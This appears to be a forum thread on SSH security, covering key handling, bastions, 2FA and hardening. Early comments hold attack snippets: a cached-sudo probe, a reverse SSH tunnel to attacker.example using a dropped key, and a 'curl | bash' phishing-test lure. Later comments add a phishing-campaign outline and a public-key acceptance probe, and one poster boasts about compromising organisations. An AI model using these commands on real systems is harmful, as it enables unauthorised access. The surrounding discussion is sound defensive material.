All I have to do is trick your folks into testing a ruby / python / perl / bash script for me that will drop a key on your machine, fire up ssh using that key and tunnel back to my host. Now I have full control of your secure (banking, government, eCommerce) environment, completely bypassing 2 factor authentication. Just one link to one of your email distros and up to 10% of your folks will run it.
Combine this with sudo credential caching and now I have root on all of your systems without having to bother finding vulns.
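A minimal sketch of that sudo angle (assuming the default credential-caching timeout): a script running as the user can silently probe for a cached ticket, since -n makes sudo fail rather than prompt.

  # probe for cached sudo credentials without triggering a password prompt
  if sudo -n true 2>/dev/null; then
      sudo -n id   # runs as root with no interaction
  fi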
Thx to Prandium for the demo of this simple social engineering exploit.
...install a rootkit or botnet client regardless of how you've configured ssh.
What does this have to do with ssh at all? The attacker could just as easily set up an outgoing VPN-over-TLS in the same way.
Another reason this involves SSH is that you already have it. I am not installing anything. I am just dropping a key on your machine and (as you) spawning ssh and a reverse tunnel back to a VM I control. No need for root :-) Now I just leverage your existing multiplexed connections into your development and production environments. Your syslog server will not log me connecting, since I am just leveraging your existing channelized SSH session.
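For the curious, a rough sketch of those mechanics (the key path and attacker host are hypothetical, and the public half of /tmp/.k is assumed to already be in the attacker's authorized_keys):

  # open a reverse tunnel: port 2222 on the attacker's VM now
  # forwards back to this machine's sshd
  ssh -i /tmp/.k -f -N \
      -o StrictHostKeyChecking=no \
      -R 2222:localhost:22 \
      tunnel@attacker.example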
This is leveraging a bad configuration that everyone has in SSH by default. In most cases, the attacker can leverage the commonly misconfigured sudo as well.
If my government would give me legal immunity, I would prove this to you by popping nearly every major company or government office in my country in three weeks or less.
Perhaps some of the confusion here is that it is assumed ssh keys are in use? In an environment that requires 2FA, keys would not be allowed. People would be using RSA tokens, Duo, Yubikeys, etc. This method bypasses those things.
It also means, anyone using the defaults in OpenSSH is not PCI compliant.
I am not even sure this method of accessing development or production environments is illegal, as the user is providing access; I am not hacking anything, nor am I authenticating into anything. The door is wide open. If this were a game of chess, I would get checkmate in one move.
The vulnerability is the attacker being able to run arbitrary code as the user.
Running around screaming "OMG OMG, the tool designed to tunnel over the network can be used to tunnel over the network, TEH SKY IS FALLING!!1!!!" is even somewhat funny in this context.
The constant news of companies getting popped is actually quite entertaining. The only thing folks may be concerned about is that if too many companies get popped, there may be some heavy handed legislation that starts to affect people. Even that I am perfectly fine with.
(you are likewise assuming there are multiplexed connections, which is a great leap - these are off by default)
What you have demonstrated is the simplest possible botnet technique, using SSH as the transport and social engineering as the vector; for some reason, you consider it groundbreaking. Well, it would have been - in 2000.
There are literally tens of thousands of articles telling folks to enable ControlMaster (Multiplexing) on the client to "make ssh faster". You would be hard pressed to find a devops shop that isn't already using ControlMaster in their ssh client config. There are at least a handful of government and financial sites that set MaxSessions to 1 because they understand the risk.
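For reference, a sketch of both sides. The client config those articles recommend (~/.ssh/config):

  Host *
      ControlMaster auto
      ControlPath ~/.ssh/cm-%r@%h:%p
      ControlPersist 10m

And the server-side mitigation those sites use (sshd_config):

  # limit each network connection to a single session, defeating
  # piggybacking on an existing multiplexed connection
  MaxSessions 1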
It all boils down to "if you require security, you can't have a default-open environment"; blaming a specific tool seems ... strange.
Get permission from your privacy and legal team before you do this of course. Write a small script in whatever language you like. Encode a ... gosh, don't even get that fancy. Just email them something silly from an external email address like:
curl -s https://tinyvpn.org/ | bash
Arguably, plain HTML is also untrusted code, and I certainly don't trust every single one of the authors of my operating system and all of the os-level utilities and all the applications that I use, especially not Microsoft or Apple. But I'm forced to use them for work.
A year or two ago there was some hoopla about Canonical collecting some information about Ubuntu's users or something like that (don't remember exactly) and a lot of people were up in arms about how they don't trust Canonical. Canonical's reply was one of the most insightful I've ever read on the internet. They said something like, "um... but we've got root".
That's a great point. The makers of your OS, the builders of your apps, they have a lot of power over you that you grant them simply by using their stuff. You're effectively trusting them, even if you don't trust them.
You could react by not using anything that anyone you don't trust writes, or by thoroughly auditing all the source code of everything you use (you do use only open-source software which can be audited by you directly, right?). But this is not really practical for 99% of everyone on the planet.
Which is incredibly misleading.
Sure, they could put malicious code in their distribution. It could do whatever they want. And then it would be on your machine, where you can potentially discover it and publish what you've discovered and allow others to verify your discovery. Which could cause Canonical to not have root anymore, because people would immediately switch to Debian or CentOS or something else.
But if they send data from your machine to their servers, no one has any ability to determine what they do with it from there, how well they secure it, who they give or sell it to, etc. It's a completely different situation because it goes from trust-but-verify to blind trust.
Sure, in principle you could verify. You could read through all the source, you could even disassemble the binaries and read through the assembly (and don't forget to verify the hardware too). Again, who actually does that? Virtually no one.
So the two cases are a lot closer than you paint them to be.
Also, corporations do stupid, illegal, and unethical stuff all the time, even when it's clearly (especially in hindsight) not in their long-term interest to do so. Even when it would clearly destroy their reputation if the public found out they even considered it.
Even if you trust "the system" (which is more of a hope that if there's something malicious, someone out there will detect it sooner or later), there are many cases of vulnerabilities in even open source code going undetected for years... never mind vulnerabilities in binaries that you don't have the code for and whose authors aren't generous enough to clue you in on.
Canonical (or whatever source you actually get your OS or apps from) could also send you some specially crafted something that no one else gets. Now who's going to verify it for you if you don't do it yourself? How are you ever going to find out, if you're not one of the ultra-paranoid and super-skilled 0.001% of Ubuntu users with infinite time and determination who actually verifies 100% of what Canonical sends them? You just won't. And if you did, there'd be a hundred new Ubuntu versions out by the time you finished verifying even one of them.
People trust, but they very rarely verify. The size of operating systems and applications, and the skill needed to verify them, have grown beyond the point where verification is practical for the overwhelming majority of people.
I do see your point about Canonical doing whatever they want with the data they collect. That's certainly problematic. But that doesn't mean that there aren't major privacy or security issues with trusting Ubuntu (or any other OS) not to have malware on it.
Which is not the same thing as no one. And it only takes once to ruin your reputation forever (see also Sourceforge, Lenovo, etc.) Moreover, the probability of detection doesn't have to be very high at all because the cost to Canonical would be catastrophic, so any possibility whatsoever acts as a deterrent. And more so in this context because of the nature of the user base.
Your argument seems to boil down to the position that it doesn't hurt anything to go from "detection isn't perfect" to "detection isn't possible".
In my view there are emerging best practices in this area. There are two ways to reduce this risk and both are controversial:
1. Force developers to only develop software using an SSH terminal (by first connecting to a developer VPN via 2FA and then sshing into their secure development environment, where they may use tools like tmux, vi, and their programming language of choice to get the job done). In this scheme, copying source code or security credentials to a developer laptop is considered a violation and becomes a fireable offense, no questions asked.
2. Require all developers to run a private USB-bootable Linux desktop shell which is known to be clean. In this case they remain free to use modern desktop editors and emulators (such as the Android emulator). It's even possible to set up secure persistence in these environments so that the developer's browser configuration, network/VPN config, dotfiles, apt installs, etc. are stored on an encrypted filesystem on the USB device. The reason a USB image is preferred is that it's annoying to ask a new employee to repartition her personal hard drive.
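A rough sketch of option 2's encrypted persistence, following the documented Kali live-USB procedure (the device /dev/sdb3 is hypothetical -- a spare partition on the USB stick):

  cryptsetup luksFormat /dev/sdb3                    # encrypt the spare partition
  cryptsetup luksOpen /dev/sdb3 usb_persist
  mkfs.ext4 -L persistence /dev/mapper/usb_persist
  mount /dev/mapper/usb_persist /mnt
  echo "/ union" > /mnt/persistence.conf             # persist dotfiles, apt installs, etc.
  umount /mnt && cryptsetup luksClose usb_persist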
My suspicion is that as more of the tools developers rely on become cloud-based (e.g. GitHub, Cloud9, Jenkins), we will eventually see these modern best practices against client-side attacks adopted more broadly. The quality and reliability of hot-bootable, ultra-secure cloud operating systems has gone through the roof over the past couple of years, and I assume this trend will only accelerate as Google Chrome OS continues to penetrate more of the market and consumers get used to it.
TLDR: ssh keys sitting on developer hard drives are an info-sec anti-pattern; they should only ever exist in system memory or in an encrypted partition on a USB stick.
1. Company walks you through setting up FileVault (with key escrow) and VPN client, generating and uploading SSH public key immediately after unboxing laptop.
2. OneLogin + Duo (or pick your SSO/2FA scheme) for everything - internal webapps, GMail, etc.
3. SSH keys managed by Puppet.
4. 2FA verification of SSH logins (using pam-interactive), through a bastion (a provided .ssh config makes it transparent; see the sketch after this list), with OSX's default SSH agent, and with pretty much all of those best practices configured except smartcards/certs.
5. Engineers have SSH access only to utility/development boxes. You can deploy code to production through a webapp (identifying the commit ID) but you can't get a shell as your application's user, and certainly not root.
6. Webapps moving behind a VPN.
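A minimal ~/.ssh/config sketch of the transparent-bastion setup from item 4 (host names are hypothetical):

  Host bastion.corp.example
      User alice

  Host *.prod.example
      ProxyCommand ssh -W %h:%p bastion.corp.example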
In the rare case that you need to debug in production beyond what you can get from metrics/logs, you pair with a "blessed"/senior sysadmin type.
I <3 Duo Security.
Automate the build and deployment environment on a system that developers don't have direct access to. Instead of pushing changes, the bot pulls a specified release branch, builds, tests, and deploys the code. All without human interaction.
If malicious code were somehow introduced from a developer's environment, it would be recorded and reflected in the commit history.
AFAIK, that's how GitHub manages deployments via Hubot. See https://www.youtube.com/watch?v=NST3u-GjjFw.
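A minimal sketch of such a pull-based bot (the repo path, branch name, and make targets are hypothetical), run from cron or CI on a box developers can't log into:

  set -euo pipefail
  cd /srv/build/app
  git fetch origin release
  git checkout -q origin/release   # deploy exactly what's in the branch
  make test                        # refuse to ship a failing build
  make deploy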
To take things a step further, public-facing environments should be made immutable wherever possible, with the entire system being built and released as a whole. Docker alleviates some of the complexity and overhead, but I think this space is where unikernels have a lot of potential to shine.
There's a very good talk about how the Wunderlist team used chaos and frequent destruction of their environments to overcome fear and uncertainty here: https://www.youtube.com/watch?v=RrX_28s70ww&app=desktop.
Emphasis is placed on the frequent disposal and recreation of environments rather than on building long-running persistent environments.
This setup probably won't work for long-lived systems (e.g. databases). In those cases, access via a transient environment like a USB-bootable OS would be ideal to prevent persistent viruses/trojans. Ironically, the best current options are security-focused distros like Kali Linux that put a special emphasis on avoiding persistent state. Maybe one day soon we'll see an admin-focused OS that better fits this role.
Most complex systems fail in unexpected ways, and the best way to debug is to grant the devs access to production machines. It can be temporary, monitored and through a secure channel, but it's still something most organizations can hardly live without.
So yeah, most organizations couldn't do this today, because they don't have the deploy process in place. But when an organization has made the switch, then it is much more realistic to assume that it can get along without granting ad hoc ssh access to production systems.
Hopefully, this practice -- and the tools required to make it happen -- get better with time.
It's also the least likely to happen. Attackers will have broken deep into your database due to poor webapp security before getting a hold of your ssh private key.
Not that SSH security doesn't matter. It's easy enough and carries enough risks that putting some effort into it is worthwhile.
A motivated attacker will always tend to try the "low tech" approaches first, to rule them out as a first step: they don't require as much sophisticated technical attention, and it's a well-known fact that human beings are more often than not the weakest link in the chain of security.
It goes something like this:
1. Enumerate the employees: build a list of all their work emails and try to obtain their personal emails and those of their spouses and children.
2. Investigate the background of executives so that a compelling phishing email can be crafted which looks like it originated from high up within the organization.
3. Send targeted phishing emails designed to bait people within the organization to visit webpages that exploit Adobe Flash attack vectors or other browser-based vulnerabilities, or perhaps even lure them into installing a trojan directly.
4. After someone in the organization falls victim to the client-side attack, read their emails to learn more about the organization's structure so that your next phishing attack can be more refined, specific, and compelling, and can possibly use a real corporate email address.
5. Rinse and repeat until you eventually gain access to a developer laptop where you can grab production environment SSH keys. Now you own the network without even having to scan a single server and without leaving a trace in the log files.
For startups, the #1 risk is a vulnerability in some web app, or a forgotten admin panel, that leaks the entire database to an attacker. Not a complex attack conducted by a nation-sponsored offensive team.
But again, SSH security matters, you should take it seriously.
I think you may have a dangerous attitude about it, because in modern times it's not a question of whether you're a big enterprise or a startup; it's a question of whether the dataset at the nucleus of your system would be valuable on the black market. If an attacker or group of attackers thinks your dataset could be saleable one day as your company continues to grow, then instead of trying to buy your equity on the secondary markets, they may invest in trying to "own" your infrastructure now, before you become big enough to put your employees through white-hat training around social engineering.
I suppose my point here is that it does make sense for startups to put their teams through proper white-hat training, but it doesn't have to be expensive because you can roll your own. What I suspect is that in 10 years or so this kind of anti-social-engineering training will be standard for all IT knowledge workers, not just programmers, and will likely be part of the job interview process.
We are arguing over something moot, though, since we both agree: take it seriously.
> Host B
> ProxyCommand ssh -W B:22 A
> Host B
> ProxyCommand ssh -W %h:%p A
Saying "they are public so it's ok" is technical oversimplification.
The word "public" is just a name for a kind of key defined in the field of cryptography and doesn't necessarily hold the same connotation in application protocols that use public key cryptography. One example would be an ephemeral public key that has to be kept private to retain forward secrecy (although in such schemes DH is usually used).
Consider as well this situation, which is closer to SSH. Suppose you are an MS dev working on the NT kernel who by night also wants to contribute anonymously to Linux. Obviously neither camp would like you to do that, for fear of copyright infringement, but OpenSSH shouldn't betray the anonymity you could reasonably expect. It's imaginable that only one public key pair would be needed -- to authenticate the server -- if password authentication is used for the client. The user doesn't expect the client software to silently generate a key pair, much less reuse the same pair for every domain, because the pair is not strictly needed. Although users should inform themselves about how the software works, good software similarly shouldn't behave in ways that are reasonably unexpected to people familiar with the domain. Ideally, if the OpenSSH developers can't foresee it working any other way, OpenSSH should at least explicitly tell the user which public key will be used before the connection is established, so as not to assume the consent of poorly informed users.
It's not. The whole idea of the scheme is that you can publish them everywhere with no risk.
Not sharing public keys between different services and contexts (eg not using your Github keys for anything else) mitigates this risk significantly.
How? That's not how public key auth works...
> Not sharing public keys between different services and contexts (eg not using your Github keys for anything else) mitigates this risk significantly.
This is true for other reasons, and you can automate it with some shell scripts.
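For example (a sketch; the key name is arbitrary): generate a dedicated key per service, then pin it in ~/.ssh/config so only that key is ever offered to that host:

  ssh-keygen -t ed25519 -f ~/.ssh/id_github -C "github-only key"

  Host github.com
      IdentityFile ~/.ssh/id_github
      IdentitiesOnly yes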
This means that a malicious client with just the public key can probe to see if a server will accept a given username/public key combo. If the server does, it will challenge you to authenticate that you hold the private key (which you'll have to fail, since you don't have it).
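A sketch of such a probe, assuming you hold only the target's public key in target_key.pub (exact debug output varies by OpenSSH version): pointing -i at the public key makes ssh offer it, and the verbose log reveals whether the server would accept it before any proof of possession is needed.

  ssh -v -o IdentitiesOnly=yes -o PasswordAuthentication=no \
      -i target_key.pub user@host 2>&1 | grep 'Server accepts key'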
Well that's an ... interesting (read: stupid) design choice. I get that it reduces load on the server, but how many public keys is one user likely to have? Surely you could do something with ring signatures to make it not even require knowing which key was used?
My point is you are better off designing things assuming that usernames and public keys are public information. That doesn't mean you have to go publish them on your website, but you also don't need to worry about mitigating it if someone else does.
One of the main uses of smartcards is to use it on other machines (eg: not mine). What's the added benefit of adding one if I'm logging in from my local machine?
I use PIV (NIST SP 800-73) compliant smartcards with a PKCS#11 module I wrote (CACKey); it just works with "ssh-add -s /path/to/libcackey.so", then SSH away.
Additionally, there is a fork of OpenSSH called PKIXSSH that adds X.509 certificate support (alongside OpenSSH certificates, whose support is relatively recent compared to the fork), so I can authenticate to remote systems using my certificate -- which is helpful when my card is replaced, or, if my certificate is revoked, because the CRLs can be used.
And that sudo workaround is bad since it requires agent key forwarding, which you shouldn't use for the reasons the author himself noted a few paragraphs up.
Quite recently: Security was concerned about enforcing ssh key rotation, and was pushing for sysops to generate and store (obviously unencrypted) private keys for all users on a central jump host, and to provide users access to that host using passwords (for which enforcing lifecycle policies is easier).
That is slowly starting to change, however. PCI DSS 3.0 gets a bit more specific and starts to go down some technical rabbit holes. PCI DSS 4.0 will be even more specific and have more technical requirements (vs. checkboxes).
Here's the thing: they say they can't force users to encrypt their private keys (hogwash; you can have a local agent that checks that), but do they check that users are providing good passwords? I have much more faith in a randomly generated key than I do in a human-generated password. The former pretty much requires compromising the machine; the latter I can just take pot-shots at the server with. (They do rate-limit your SSH password attempts, right? Right?)
Even if we assume that the password is good, and that the server won't allow infinite tries to guess it, the security is only equivalent: compromise of the user's local account will reveal the password (just sniff the password) or the key (just read the keyfile, and sniff the password if it is encrypted). I don't see any world in which a password is more secure than a key.
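As for the parenthetical above, a rough sketch of that local check: any key that loads with an empty passphrase is not passphrase-protected.

  for k in ~/.ssh/id_*; do
      case "$k" in *.pub) continue ;; esac
      if ssh-keygen -y -P '' -f "$k" >/dev/null 2>&1; then
          echo "WARNING: $k is not encrypted"
      fi
  done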
> we're not allowed to use key auth.
i.e., they're using password based auth.¹ The point of my post is that while certainly users leaving the private key unencrypted isn't good, trading that for password auth leaves you in a worse state overall (IMO).
¹Of course, they could be using an auth scheme that is neither password nor key based. But given that the parent didn't come out and say that, my gut says that's not the case here.
A user wants to write an SQL query. The user writes it in notepad or whatever, and saves it in a .sql file. The user then will right click on this file they just created, and hit "Scan with McAfee antivirus". If the .sql file they just created comes up clean, they can then open it in SQL Manager and execute it. If they want to then adjust the query, they have to close the file and start over, running the scan again. People can and have been fired over getting lazy about that process.
There's a security consultant with a clipboard who firmly believes this improves security.
For extra credit, set up port knocking.
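A hypothetical knockd sketch of that (the sequence and ports are arbitrary): sshd stays firewalled until the right knock arrives, then the knocking IP is let in.

  [options]
      logfile = /var/log/knockd.log

  [openSSH]
      sequence    = 7000,8000,9000
      seq_timeout = 5
      tcpflags    = syn
      command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT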
As a cherry on top you can put the password in LDAP or RADIUS server and hook up traditional 2FA (Google Auth, Yubikey, Email, SMS) for that legendary 3FA (ah... "something (else) you have"). Sounds hokey, but defense is best in depth.
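On the OpenSSH side, stacking factors like that is expressible directly -- a sketch, assuming UsePAM yes and a PAM stack that prompts only for the OTP:

  # sshd_config: require a key, then a password, then the PAM-driven OTP
  AuthenticationMethods publickey,password,keyboard-interactive
  ChallengeResponseAuthentication yes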
3FA is:
* Something you have (normally one OR MORE user IDs)
* Something you know (normally the associated password or passwords for the user ID(s))
* Something you are (normally biometric)
[edit: technically, it's multi-factor when using multiple user/passwords - here's a useful link https://pciguru.wordpress.com/2010/05/01/one-two-and-three-f...]
You have your fingers. You have your eyes.
In fiction and movies, these are things that could be taken from you (your fingers severed, your eyes plucked out) and used to get past biometric scanners.
In real life there are easier, stealthier, and less gruesome methods for getting those things: just copy them. (Gummy bear fingerprints, anyone?)
 - http://www.theregister.co.uk/2002/05/16/gummi_bears_defeat_f...
 - http://www.cryptome.org/gummy.htm
 - http://www.it.slashdot.org/story/10/10/28/0124242/aussie-kid...
I think biometrics may have a place in tamper-proof devices like iPhones (infamous error 53) or biometric smartcards (needing a fingerprint to unlock secrets).
A single shared key is a security disaster waiting to happen.
You can read about this in the `CERTIFICATES` section of ssh-keygen(1).
It's still not a great setup, because it makes auditing a nightmare. (Unfortunately, a particular software package we use essentially requires it due to its bad architecture.)
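The gist of the CERTIFICATES alternative, as a sketch (file names hypothetical): keep one CA, sign each user's key, and have servers trust the CA instead of a pile of shared or individual keys -- each certificate carries an identity, which also helps the auditing problem.

  ssh-keygen -t ed25519 -f ca_key                    # the CA keypair
  ssh-keygen -s ca_key -I alice -n alice -V +52w \
      -z 1 id_ed25519.pub                            # certify alice's key

  # sshd_config on the servers:
  TrustedUserCAKeys /etc/ssh/ca_key.pub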
> Unfortunately ssh-keygen does not support input from stdin, so this example is slightly more complicated than it should.
Any shell that supports process substitution can fix this for you with something like:
ssh-keygen -l -f <(ssh-keyscan korell)
I don't like that you have to alias ssh or replace /usr/xxx/bin/ssh with a symlink to make it work.
BTW, you can also now use hardware devices (like TREZOR and KeepKey) to perform "ssh-agent" functionality in hardware, with minimal setup work.
Blog post: https://medium.com/@satoshilabs/trezor-firmware-1-3-4-enable...
Source code: https://github.com/romanz/trezor-agent (the README has several demo screencasts).
This doesn't make sense. You can safely set up SSH agent forwarding to ssh from server to server without storing your ssh private key anywhere but your local host.
ProxyCommand ssh -W $(echo %h | sed 's/^.*+//') $(echo %h | sed 's/+[^+]*$//;s/\([^+%%]*\)%%\([^+]*\)$/\2 -l \1/;s/:\([^:+]*\)$/ -p \1/')
$ ssh login1%host1:port1+login2%host2:port2+login3%host3:port3+host4:port4 -l login4